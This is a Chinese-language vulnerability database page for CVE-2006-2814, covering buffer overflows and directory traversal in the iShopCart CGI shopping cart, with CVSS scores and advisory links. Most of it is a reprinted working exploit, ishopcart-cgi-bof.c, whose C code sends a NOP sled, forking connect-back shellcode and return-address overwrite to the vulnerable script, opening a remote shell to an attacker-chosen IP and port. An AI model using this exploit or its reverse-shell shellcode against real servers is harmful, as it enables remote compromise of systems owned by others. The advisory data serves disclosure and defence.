CVE-2006-2814
CVSS7.5
发布时间 :2006-06-05 13:02:00
修订时间 :2011-03-07 21:37:04
NMCOE    

[原文]Multiple buffer overflows in the (1) vGetPost and (2) main functions in easy-scart.c through easy-scart6.c in iShopCart allow remote attackers to execute arbitrary code by sending a large amount of data containing "Submit" in an sslinvoice action, and allow remote attackers to have an unknown impact via a large amount of posted data.


[CNNVD]iShopCart 多个远程安全漏洞(CNNVD-200606-093)

        iShopCart是一种基于Web的电子商务软件。
        iShopCart在处理畸形的用户请求时存在多个安全漏洞,远程攻击者可能利用这些漏洞执行目录遍历或以服务器进程权限执行任意指令。
        iShopCart的easy-scart.cgi脚本没有正确过滤用户参数数据,攻击者可以在其中插入"../"序列导致目录遍历。iShopCart的main()及vGetPost()函数中分别存在固定长度缓冲区的溢出问题,远程攻击者可以通过超长的参数数据导致执行恶意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2814
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2814
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-093
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2108
(UNKNOWN)  VUPEN  ADV-2006-2108
http://www.securityfocus.com/bid/18222
(UNKNOWN)  BID  18222
http://www.securityfocus.com/archive/1/archive/1/435597/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060531 ishopcart cgi 0day and multiple vulnerabilities
http://xforce.iss.net/xforce/xfdb/27014
(UNKNOWN)  XF  ishopcart-easyscart-bo(27014)
http://securityreason.com/securityalert/1031
(UNKNOWN)  SREASON  1031
http://secunia.com/advisories/20415
(UNKNOWN)  SECUNIA  20415

- 漏洞信息

iShopCart 多个远程安全漏洞
高危 缓冲区溢出
2006-06-05 00:00:00 2006-06-05 00:00:00
远程  
        iShopCart是一种基于Web的电子商务软件。
        iShopCart在处理畸形的用户请求时存在多个安全漏洞,远程攻击者可能利用这些漏洞执行目录遍历或以服务器进程权限执行任意指令。
        iShopCart的easy-scart.cgi脚本没有正确过滤用户参数数据,攻击者可以在其中插入"../"序列导致目录遍历。iShopCart的main()及vGetPost()函数中分别存在固定长度缓冲区的溢出问题,远程攻击者可以通过超长的参数数据导致执行恶意指令。

- 公告与补丁

        暂无数据

- 漏洞信息 (1862)

iShopCart vGetPost() Remote Buffer Overflow Exploit (cgi) (EDBID:1862)
cgi webapps
2006-06-02 Verified
0 K-sPecial
N/A [点击下载]
/* Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: ishopcart-cgi-bof.c (<= easy-scart6.c)
 * Date: 5/25/2006
 * Version:
 *  1.00 (5/25/2006) - ishopcart-cgi-bof.c created
 *
 * Description: there is an overflow in the vGetPost() function, it does not do any size checking on the inputed data but instead
 *  reads until the word "Submit" is encountered, in turn overflowing pszBuf which points to a 4000 byte buffer in main(). Complete
 *  code execution is spawned, with the code being a connectback shell.
 *
 * Notes: I could not for the life of me find any connect back shellcode that forks! This code needed to fork because apache
 *  was killing the connect back process as soon as it connected. So, in turn, I have modified netric's callback shellcode with
 *  some forking shellcode to accomplish the workaround.
 *
 * Compile: gcc -o icb ishopcart-cgi-bof.c -std=c99
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <getopt.h>
#include <errno.h>
#include <stdlib.h>

#define PORT 		80
#define CB_PORT		31337
#define IP_OFFSET       33 + 13
#define PORT_OFFSET     39 + 13    // + 13 to these for the new forking mod added to cb[]
#define OFFSET		0x41414141 // find your own damn offset, the code works 100% any fault is on yourself

void changeip(char *ip);
void changeport(char *code, int port, int offset);
void help(void);

// netric callback shellcode
char cb[] =
        "\x31\xc0\x31\xdb" 

        "\xb0\x02"                      // movb         $0x2,%al        / sys_fork (2)
        "\xcd\x80"                      // int          $0x80
        "\x38\xc3"                      // cmpl         %ebx,%eax       / check if child; %eax = 0x0
        "\x74\x05"                      // je           0x5             / jump after the exit if we're the child
        // sys_exit (1)
        "\x8d\x43\x01"                  // leal         0x1(%ebx),%eax  / sys_exit (1) if we're the parent
        "\xcd\x80"                      // int          $0x80           / interrupt 80 to execute sys_exit
	
	"\x31\xc9\x51\xb1"
        "\x06\x51\xb1\x01\x51\xb1\x02\x51"
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
        "\x89\xc2\x31\xc0\x31\xc9\x51\x51"
        "\x68\x41\x42\x43\x44\x66\x68\xb0"
        "\xef\xb1\x02\x66\x51\x89\xe7\xb3"
        "\x10\x53\x57\x52\x89\xe1\xb3\x03"
        "\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
        "\x74\x06\x31\xc0\xb0\x01\xcd\x80"
        "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
        "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
        "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
        "\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
        "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
        "\x2f\x62\x69\x89\xe3\x50\x53\x89"
        "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
        "\x01\xcd\x80";

int main (int argc, char **argv) {
	int sock;
	unsigned offset = OFFSET, ipaddr, i = 0;
	unsigned short port = PORT, cbport = CB_PORT;
	struct sockaddr_in server;
	char *host, *location, *cbip, buff[5120], opt;

	host = location = cbip = 0;
	
	while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) {
		switch(opt) { 
			case 'i':
				host = optarg;
				break;
			case 'p':
				sscanf(optarg, "%hu", &port);
				break;
			case 'o':
				sscanf(optarg, "%x", &offset);
				break;
			case 'l':
				location = optarg;
				break;
			case '1':
				cbip = optarg;
				break;
			case '2':
				sscanf(optarg, "%hu", &cbport);
				break;
		}
	}

	if (!(host && location && cbip)) { 
		puts("-!> a required argument was missing\n");
		help();
		exit(1);
	}

        changeip(cbip);
	changeport(cb, cbport, PORT_OFFSET);
	
	if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
		printf("socket() error: %s\n", strerror(errno));
		exit(1);
	}
	server.sin_port = htons(port);	

        if ((ipaddr = inet_addr(host)) == -1) {
		struct hostent *myhost;
		if ((myhost = gethostbyname(host)) == 0) {
			printf("-!> failed to resolve host '%s'\n", host);
			exit(1);
		}
		memcpy((char*) &server.sin_addr, myhost->h_addr, myhost->h_length);
	}
	else server.sin_addr.s_addr = ipaddr;

	server.sin_family = AF_INET;
	memset(&(server.sin_zero), 0, 8);

        if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) {
	        printf("-!> connect() to '%s:%hu' failed: %s\n", host, port, strerror(errno));
		exit(1);
	}
	sprintf(buff, "GET %s?sslinvoice HTTP/1.1\nHost: %s\nContent-Length: %u\n\n", location, host, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"));
	send(sock, buff, strlen(buff), 0);

	for (0; i < 4000; i++) *(buff+i) = 0x90;
	for (unsigned a = 0; a < sizeof(cb) - 1; i++, a++)  *(buff+i) = *(cb+a);
	for (unsigned a = 0; a < 128; i += 4, a++) memcpy(buff+i, &offset, 4);
	
	strcpy(buff+4000+sizeof(cb)+512 - 1, "Submit\n");

	
	send(sock, buff, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"), 0);
}

void help (void) { 
	char *string = "ishopcart CGI shopcart buffer overflow exploit by K-sPecial (http://xzziroz.net) of .aware (http://awarenetwork.org)\nLicense: GPL (5/24/2006)\n\n"
		       "-i <%s>  \t - specifies the vulnerable host; default 80\n"
		       "-p [%hu] \t - specifies the vulnerable host's port\n"
		       "-l <%s>  \t - specifies the vulnerable CGI location\n"
		       "-o [%x]  \t - forces an explicit offset\n"
		       "-1 <%s>  \t - specifies the connect back ip\n"
		       "-2 [%hu] \t - specifies the connect back port; default 31337\n"
		       "-h	 \t - shows this help\n";

	puts(string);
}		       

void changeip(char *ip) {
        char *ptr;
        ptr=cb+IP_OFFSET;
        /* Assume Little-Endianess.... */
        *((long *)ptr)=inet_addr(ip);
}

// ripped from some of snooq's code
void changeport(char *code, int port, int offset) {
        char *ptr;
        ptr=code+offset;
        /* Assume Little-Endianess.... */
        *ptr++=(char)((port>>8)&0xff);
        *ptr++=(char)(port&0xff);
}

// milw0rm.com [2006-06-02]
		

- 漏洞信息

25969
iShopCart POST Request vGetPost() Function Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-31 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站